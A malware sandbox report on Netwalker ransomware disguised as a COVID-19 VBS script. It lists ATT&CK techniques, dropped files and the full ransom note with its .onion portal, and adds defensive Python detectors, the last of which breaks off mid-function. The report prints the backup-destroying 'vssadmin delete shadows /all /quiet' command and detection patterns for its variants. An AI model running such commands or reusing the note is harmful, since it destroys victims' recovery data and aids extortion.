
Analysis Report CORONAVIRUS_COVID-19.vbs

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 216773
Start date: 20.03.2020
Start time: 08:59:23
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 7s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: CORONAVIRUS_COVID-19.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.spre.evad.winVBS@6/226@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 24.9% (good quality ratio 24.3%)
  • Quality average: 83.7%
  • Quality standard deviation: 21.9%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .vbs
Warnings:
  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
  • Exclude process from analysis (whitelisted): dllhost.exe, MusNotifyIcon.exe, VSSVC.exe, svchost.exe, UsoClient.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Timeout during Intezer genetic analysis for unpackpe/2.1.qeSw.exe.400000.0.unpack

Detection

Strategy   | Score | Range   | Reporting | Whitelisted | Threat    | Detection
Threshold  | 100   | 0 - 100 |           | false       | Netwalker | malicious

Confidence

Strategy   | Score | Range | Further Analysis Required? | Confidence
Threshold  | 5     | 0 - 5 | false                      | (chart not reproduced)


Classification Spiderchart

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scheduled Task1 | Scheduled Task1 | Access Token Manipulation1 | Masquerading2 | Input Capture21 | Virtualization/Sandbox Evasion11 | Taint Shared Content1 | Input Capture21 | Data Encrypted1 | Standard Cryptographic Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1
Replication Through Removable Media | Scripting121 | Port Monitors | Process Injection12 | Software Packing2 | Network Sniffing | Process Discovery3 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Fallback Channels | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Execution through API3 | Accessibility Features | Scheduled Task1 | Disabling Security Tools1 | Input Capture | Security Software Discovery21 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Custom Cryptographic Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Exploitation for Client Execution1 | System Firmware | DLL Search Order Hijacking | Virtualization/Sandbox Evasion11 | Credentials in Files | File and Directory Discovery2 | Logon Scripts | Input Capture | Data Encrypted | Multiband Communication | SIM Card Swap | | Premium SMS Toll Fraud
Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Access Token Manipulation1 | Account Manipulation | System Information Discovery23 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Process Injection12 | Brute Force | System Owner/User Discovery | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Scripting121 | Two-Factor Authentication Interception | Network Sniffing | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | File Deletion1 | Bash History | Network Service Scanning | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Obfuscated Files or Information2 | Input Prompt | System Network Connections Discovery | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction

Digits following a technique name are the report's hit-count badges, reproduced as extracted; techniques without a badge were not matched in this run.

Signature Overview



AV Detection:

Multi AV Scanner detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Virustotal: Detection: 72%
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | ReversingLabs: Detection: 70%
Multi AV Scanner detection for submitted file
  Source: CORONAVIRUS_COVID-19.vbs | Virustotal: Detection: 11%
Machine Learning detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Joe Sandbox ML: detected

Spreading:

Infects executable files (exe, dll, sys, html)
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM
  Note: both hits are .htm documents under Program Files, and OSPP.HTM also appears below among the high-entropy writes. That is consistent with the encryption pass overwriting existing files in place, not with code being added to executables; the signature name overstates what was observed.
Creates COM task schedule object (often to register a task for autostart)
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
  Note: {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} is the Task Scheduler service class (ITaskService). The WOW6432Node path shows the lookup comes from a 32-bit process. Only the COM class resolution (TreatAs, InprocServer32, LocalServer32, Elevation) is recorded here; no task registration appears anywhere in the report, so read this as capability rather than confirmed persistence.
Contains functionality to enumerate / list files inside a directory
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function 2_2_0040BFC0: FindFirstFileW, FindNextFileW
Contains functionality to query local drives
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function 2_2_0040D070: Sleep, SetErrorMode, GetLogicalDriveStringsW, GetLogicalDriveStringsW, GetDriveTypeW

Networking:

Urls found in memory or binary data
  Source: qeSw.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
  Source: qeSw.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
  Source: qeSw.exe, 00000002.00000003.1385697170.0000000002774000.00000004.00000001.sdmp | String found in binary or memory: http://cvs.sourceforge.jp/cgi-bin/viewcvs.cgi/ablib/ver5lib/Include/api_richedit.sbp?revision=1.2
  Source: wscript.exe, 00000000.00000003.1069999339.00000145A3A08000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.1078628760.00000145A2104000.00000004.00000001.sdmp | String found in binary or memory: http://google.com
  Source: wscript.exe, 00000000.00000003.1069999339.00000145A3A08000.00000004.00000001.sdmp | String found in binary or memory: http://google.comd
  Source: qeSw.exe.0.dr | String found in binary or memory: http://ocsp.sectigo.com0
  Source: qeSw.exe, 00000002.00000003.1157889492.0000000000861000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.mpv
  Source: qeSw.exe, 00000002.00000003.1444918211.0000000002515000.00000004.00000001.sdmp | String found in binary or memory: http://www.AutoItScript.com
  Source: qeSw.exe, 00000002.00000002.1482113404.0000000002A6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
  Source: qeSw.exe, 00000002.00000003.1198828942.00000000029D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoit.de/index.php?page=Thread&postID=48393
  Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com
  Source: qeSw.exe, 00000002.00000003.1444104805.000000000285F000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/forum
  Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/forum/index.php?act=Search
  Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/forum/index.php?act=Search&CODE=01
  Source: qeSw.exe, 00000002.00000002.1483430813.0000000002CEC000.00000004.00000001.sdmp | String found in binary or memory: http://www.crimsoneditor.com/
  Source: qeSw.exe, 00000002.00000003.1444918211.0000000002515000.00000004.00000001.sdmp | String found in binary or memory: http://www.gwspikval.com/jooel/scripts/BBCodeParser/Older%20versions/2.0.1/BBCodeParser2.kix
  Source: qeSw.exe.0.dr | String found in binary or memory: https://sectigo.com/CPS0B
  Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp, E3495D-Readme.txt12.2.dr | String found in binary or memory: https://torproject.org/
  Note: none of these are observed connections; they are strings carved from the dropped binary (qeSw.exe.0.dr) and process memory. The sectigo.com URLs belong to the timestamping certificate chain embedded in qeSw.exe. The autoitscript.com, autoit.de, crimsoneditor.com and sourceforge.jp links are AutoIt development references, consistent with the AutoIt include and example files on the analysis machine that the sample read while encrypting them. torproject.org is the Tor download link quoted in the ransom note. The only actor-controlled address on this page is the .onion in the ransom note below.

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
  Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Installs a raw input device (often for capturing keystrokes)
  Source: qeSw.exe, 00000002.00000003.1425223756.00000000027B9000.00000004.00000001.sdmp | Binary or memory string: _winapi_registerhotkey _winapi_registerpowersettingnotification _winapi_registerrawinputdevices \
  Note: both signatures rest on strings, not on observed API calls. The first is an XML hook descriptor naming DirectDraw (DDRAW.DLL), not DirectInput. The second lists AutoIt UDF names (_WinAPI_RegisterRawInputDevices and neighbours live in the AutoIt WinAPI include library), which the sample would have pulled into memory while enumerating and encrypting the AutoIt3\Include files listed below. Treat the keystroke-capture verdicts, and the Analysis Advice that follows from them, as low confidence.

Spam, unwanted Advertisements and Ransom Demands:

Found ransom note / readme
  Source: C:\Program Files (x86)\AutoIt3\E3495D-Readme.txt | Dropped file:
    Hi!
    Your files are encrypted by Netwalker.
    All encrypted files for this computer has extension: .e3495d
    --
    If for some reason you read this text before the encryption ended,
    this can be understood by the fact that the computer slows down, and your heart rate has increased due to the ability to turn it off,
    then we recommend that you move away from the computer and accept that you have been compromised.
    Rebooting/shutdown will cause you to lose files without the possibility of recovery.
    --
    Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program.
    Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.
    For us this is just business and to prove to you our seriousness, we will decrypt you one file for free.
    Just open our website, upload the encrypted file and get the decrypted file for free.
    --
    Steps to get access on our website:
    1.Download and install tor-browser: https://torproject.org/
    2.Open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion
    3.Put your personal code in the input form:
    {code_e3495d:VGBnzZ8UgmHbW6fuVJ0M9eiLVtjCc+ApVmrkZij+mGV4kA8mQdvB9+yISdG31/J1PojgSFiJre0xJFBFimFsOS28x/G/DfVz41ZjAtHP1KT1VQeqqDojoDx1cxD4NhGtmQHS6tJN3nzNpvbJ2fekS0vRR0T1XzwvGLfd0PMU1BMt2dSMGLkySf90vdYkCXTZTVZXv3/6N1cB8IDQPjtL9ijD42Z0yO8cHh6nF0Bru2OMqB7XCgd91Q9xwN8097CRFA3nL6Fl0RKpgJ3hO5rIOPOdmHmAS/6QYw==}
Yara detected Netwalker ransomware
  Source: Yara match | File source: Process Memory Space: qeSw.exe PID: 244, type: MEMORY
Deletes shadow drive data (may be related to ransomware)
  Source: unknown | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
  Source: vssadmin.exe, 00000003.00000002.1135051160.000002BDD1945000.00000004.00000040.sdmp | Binary or memory string: C:\Windows\system32\vssadmin.exedeleteshadows/all/quiet
  Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
  Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
  Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: vssadmin Delete Shadows
  Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
  Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
  Source: vssadmin.exe, 00000003.00000002.1134855531.000002BDD1730000.00000004.00000020.sdmp | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exeC:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\vssadmin.exeWinSta0\Default
  Source: vssadmin.exe, 00000003.00000002.1134855531.000002BDD1730000.00000004.00000020.sdmp | Binary or memory string: C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
  Note: the "Example Usage:" strings are vssadmin's own help text and will be present in any vssadmin.exe memory image. The evidence is the process-creation record (vssadmin.exe spawned by qeSw.exe from %TEMP% with "delete shadows /all /quiet") and the matching command line in the child's memory; the space-stripped form "vssadmin.exedeleteshadows/all/quiet" is how the argument vector appears when carved from memory, which is worth remembering when writing string-based detections.
May disable shadow drive data (uses vssadmin)
  Source: unknown | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
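The process-creation record above (vssadmin.exe launched by qeSw.exe from %TEMP% with "delete shadows /all /quiet") is the detection that matters in this section, and the space-stripped copy in memory shows why a naive substring match on "delete shadows" is brittle. The following is an added example for this report, not Joe Sandbox code: it classifies process-creation events by matching on a whitespace-free, lower-cased command line and raises severity when the parent lives in a user-writable directory. The event field names (image, command_line, parent_image) are assumptions modelled on Sysmon Event ID 1; the first sample event reproduces the launch the report recorded, the others are constructed, and the wmic, PowerShell and "resize shadowstorage" rules generalise beyond what this run shows.

```python
"""Detect Volume Shadow Copy deletion in process-creation telemetry.

Added example for this report, not Joe Sandbox code. Event fields are
assumptions modelled on Sysmon Event ID 1 (image, command_line, parent_image).
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# (binaries, pattern over the whitespace-free lower-cased command line).
# Matching the compacted form means "delete shadows", "delete  shadows" and the
# squashed "deleteshadows" carved from vssadmin.exe memory all hit the same rule.
SHADOW_DELETE_RULES = [
    (("vssadmin",), re.compile(r"deleteshadows")),
    (("vssadmin",), re.compile(r"resizeshadowstorage.*/maxsize=")),  # shrink storage to evict copies
    (("wmic",), re.compile(r"shadowcopy.*delete")),
    (("powershell", "pwsh"),
     re.compile(r"win32_shadowcopy.*(remove-wmiobject|remove-ciminstance|\.delete\(\))")),
]

# Shadow-copy maintenance launched from these locations is almost never legitimate.
SUSPECT_PARENT_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                       "\\users\\public\\", "\\programdata\\")


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process


def compact(cmd: str) -> str:
    """Lower-case the command line and strip quotes and all whitespace."""
    return re.sub(r"[\s\"']+", "", cmd.lower())


def classify(ev: ProcEvent) -> Optional[dict]:
    """Return a finding for a shadow-copy deletion event, else None."""
    exe = ev.image.lower().rsplit("\\", 1)[-1]
    line = compact(ev.command_line)
    for binaries, pattern in SHADOW_DELETE_RULES:
        if exe.startswith(binaries) and pattern.search(line):
            parent = ev.parent_image.lower()
            from_user_dir = any(d in parent for d in SUSPECT_PARENT_DIRS)
            return {
                "image": exe,
                "matched": pattern.pattern,
                "parent": ev.parent_image,
                "severity": "high" if from_user_dir else "medium",
            }
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[int, dict]]:
    """Run classify() over a batch, keeping the event index for triage."""
    hits = []
    for i, ev in enumerate(events):
        finding = classify(ev)
        if finding:
            hits.append((i, finding))
    return hits


# Constructed sample batch. Event 0 reproduces the launch in the report.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\vssadmin.exe",
              r"C:\Windows\system32\vssadmin.exe delete shadows /all /quiet",
              r"C:\Users\user\AppData\Local\Temp\qeSw.exe"),
    ProcEvent(r"C:\Windows\System32\vssadmin.exe",            # benign enumeration
              "vssadmin list shadows",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\vssadmin.exe",            # space-stripped argv, as carved from memory
              r"C:\Windows\system32\vssadmin.exedeleteshadows/all/quiet",
              r"C:\Users\user\AppData\Local\Temp\qeSw.exe"),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe",           # WMI route (constructed)
              "wmic shadowcopy delete",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # PowerShell route (constructed)
              'powershell -c "Get-WmiObject Win32_ShadowCopy | Remove-WmiObject"',
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```

Events 0 and 2 come back "high" because the parent is the dropped binary in %TEMP%; the wmic and PowerShell variants are "medium", and "vssadmin list shadows" produces nothing.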
Writes a notice file (html or txt) to demand a ransom
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped, one per encrypted directory, each carrying the same E3495D-Readme.txt text quoted above (some copies contain the text twice):
    C:\Program Files (x86)\AutoIt3\E3495D-Readme.txt
    C:\Program Files (x86)\Microsoft Office\E3495D-Readme.txt
    C:\ProgramData\E3495D-Readme.txt
    C:\Program Files\7-Zip\E3495D-Readme.txt
    C:\Program Files (x86)\AutoIt3\Include\E3495D-Readme.txt
    C:\Program Files (x86)\Free Window Registry Repair\E3495D-Readme.txt
    C:\Program Files (x86)\AutoIt3\Examples\E3495D-Readme.txt
    C:\Program Files (x86)\Adobe\Acrobat Reader DC\E3495D-Readme.txt
    C:\Program Files (x86)\AutoIt3\Extras\E3495D-Readme.txt
    C:\Program Files (x86)\AutoIt3\Examples\GUI\E3495D-Readme.txt
  Note: the note file name, the appended file extension (.e3495d) and the "code_e3495d" tag inside the note share one per-victim identifier, so a hunt for "*-Readme.txt" next to files with an unknown six-character extension is a reasonable host-wide sweep.
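The ransom note above and the dropped copies listed here carry the incident's key indicators: the per-victim extension, the .onion portal, and the base64 "personal code". The following is an added example, not part of the Joe Sandbox report, that pulls those fields out of a note and checks that the extension and the code tag agree. SAMPLE_NOTE is constructed to mirror the E3495D-Readme.txt layout; it keeps the report's extension and .onion address but uses a placeholder generated in the code for the personal-code blob, which in the real note is opaque ciphertext.

```python
"""Extract IOCs from a Netwalker-style ransom note.

Added example, not Joe Sandbox code. SAMPLE_NOTE is constructed to mirror
the E3495D-Readme.txt in the report; PLACEHOLDER_CODE stands in for the
real (opaque) personal-code blob.
"""
import base64
import binascii
import re
from typing import Optional

PLACEHOLDER_CODE = base64.b64encode(
    b"constructed placeholder, not the real victim key blob").decode()

SAMPLE_NOTE = (
    "Hi!\n"
    "Your files are encrypted by Netwalker.\n"
    "All encrypted files for this computer has extension: .e3495d\n"
    "--\n"
    "Steps to get access on our website:\n"
    "1.Download and install tor-browser: https://torproject.org/\n"
    "2.Open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion\n"
    "3.Put your personal code in the input form:\n"
    "{code_e3495d:" + PLACEHOLDER_CODE + "}\n"
)

EXT_RE = re.compile(r"extension:\s*(\.[0-9a-z]{4,12})", re.I)
# v2 onions are 16 base32 chars, v3 onions are 56; the trailing ".onion" anchors the match.
ONION_RE = re.compile(r"\b([a-z2-7]{16}|[a-z2-7]{56})\.onion\b", re.I)
CODE_RE = re.compile(r"\{code_([0-9a-z]+):([A-Za-z0-9+/=]+)\}", re.I)
FAMILY_RE = re.compile(r"encrypted by\s+([A-Za-z0-9]+)", re.I)


def decode_code(blob: str) -> Optional[bytes]:
    """Strict base64 decode; None if the blob is not clean base64."""
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def parse_ransom_note(text: str) -> dict:
    """Return family, extension, onion address and personal code from a note."""
    ext = EXT_RE.search(text)
    onion = ONION_RE.search(text)
    code = CODE_RE.search(text)
    family = FAMILY_RE.search(text)
    result = {
        "family": family.group(1) if family else None,
        "extension": ext.group(1).lower() if ext else None,
        "onion": onion.group(0).lower() if onion else None,
        "onion_version": {56: 3, 16: 2}.get(len(onion.group(1))) if onion else None,
        "code_tag": code.group(1).lower() if code else None,
        "code_b64": code.group(2) if code else None,
        "code_bytes": decode_code(code.group(2)) if code else None,
    }
    # In this report the note name, the appended extension and the code tag all
    # carry the same per-victim id; a mismatch means the note was not written by
    # the run that encrypted the files next to it.
    result["tag_matches_extension"] = (
        result["extension"] is not None
        and result["code_tag"] == result["extension"].lstrip(".")
    )
    return result


if __name__ == "__main__":
    for key, value in parse_ransom_note(SAMPLE_NOTE).items():
        print(f"{key}: {value!r}")
```

The decoded code bytes are of no use to the victim (the blob is the attacker's encrypted key material), but their length and the strictness of the base64 are a cheap way to tell a genuine note from a tampered or truncated copy.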
Writes many files with high entropy
  Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created (Shannon entropy in bits per byte):
    C:\Program Files (x86)\AutoIt3\AutoIt.chm  7.99637670441
    C:\Program Files\7-Zip\7z.sfx  7.99565121131
    C:\Program Files\7-Zip\7zCon.sfx  7.99580913438
    C:\Program Files (x86)\AutoIt3\Include\GDIPlus.au3  7.99334234588
    C:\Program Files (x86)\Microsoft Office\AppXManifest.xml  7.99508004778
    C:\Program Files (x86)\AutoIt3\Include\GuiListView.au3  7.99536700031
    C:\Program Files (x86)\AutoIt3\Include\WinAPIGdi.au3  7.99631912699
    C:\Program Files (x86)\AutoIt3\Include\ie.au3  7.99586892518
    C:\Program Files\7-Zip\7-zip.chm  7.99666218983
    C:\Program Files (x86)\AutoIt3\Include\Date.au3  7.99525208127
    C:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties  7.99546197118
    C:\Program Files (x86)\AutoIt3\Include\GuiTreeView.au3  7.99524549325
    C:\Program Files (x86)\AutoIt3\Include\Array.au3  7.99563928777
    C:\Program Files (x86)\AutoIt3\Include\APIErrorsConstants.au3  7.99595363557
    C:\Program Files (x86)\AutoIt3\Include\GuiToolbar.au3  7.99483060331
    C:\Program Files (x86)\AutoIt3\Include\Misc.au3  7.99003480004
    C:\Program Files (x86)\AutoIt3\Include\NetShare.au3  7.99079701727
    C:\Program Files (x86)\AutoIt3\Include\GuiRichEdit.au3  7.99537140624
    C:\Program Files (x86)\AutoIt3\Include\WinAPIFiles.au3  7.99538566422
    C:\Program Files (x86)\AutoIt3\Include\NTSTATUSConstants.au3  7.99680981932
    C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS  7.99487655592
    C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM  7.99271754146
    C:\Program Files (x86)\AutoIt3\Include\WinAPISys.au3  7.99538437408
    C:\Program Files (x86)\AutoIt3\Include\WindowsConstants.au3  7.99033845378
    C:\Program Files (x86)\AutoIt3\Include\WinAPILocale.au3  7.9900245833
    C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.xml  7.99039775943
    C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.chm  7.99571471216
  Note: compiled help files (.chm) and the 7-Zip SFX stubs are compressed and read close to 8.0 bits per byte even before encryption, so those entries prove little on their own. The telling entries are the .au3, .xml, .properties, .VBS and .HTM text files: plain source and markup normally sits well below 6 bits per byte, and every one of them here is at 7.99.
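The signature above rests on a Shannon entropy measurement, and the note on it is the whole detection logic: near-8.0 entropy on a file whose format should be textual is the signal, near-8.0 on an already-compressed format is noise. The following is an added example, not Joe Sandbox code, that computes the same measure and applies that distinction; the sample files are constructed in-line (a plaintext stand-in for an AutoIt include and random bytes standing in for encrypted output), with names borrowed from the report's paths.

```python
"""Shannon entropy check for suspected ransomware output.

Added example, not Joe Sandbox code. Sample contents are constructed
in-line; the file names mirror paths seen in the report.
"""
import math
import os
from collections import Counter
from typing import Dict, List, Tuple

# Formats that are high-entropy by design (compressed or packed). A reading of
# 7.99 on these says nothing; on a text format it is the tell.
NATURALLY_DENSE = {".chm", ".sfx", ".zip", ".7z", ".gz", ".png", ".jpg", ".cab", ".msi"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def flag_encrypted(files: Dict[str, bytes], threshold: float = 7.9) -> List[Tuple[str, float, str]]:
    """Return (path, entropy, verdict) for every file at or above the threshold.

    verdict is "strong" for a normally textual format reading as near-random and
    "weak" for a format that is dense even when untouched.
    """
    findings = []
    for path, data in files.items():
        h = shannon_entropy(data)
        if h < threshold:
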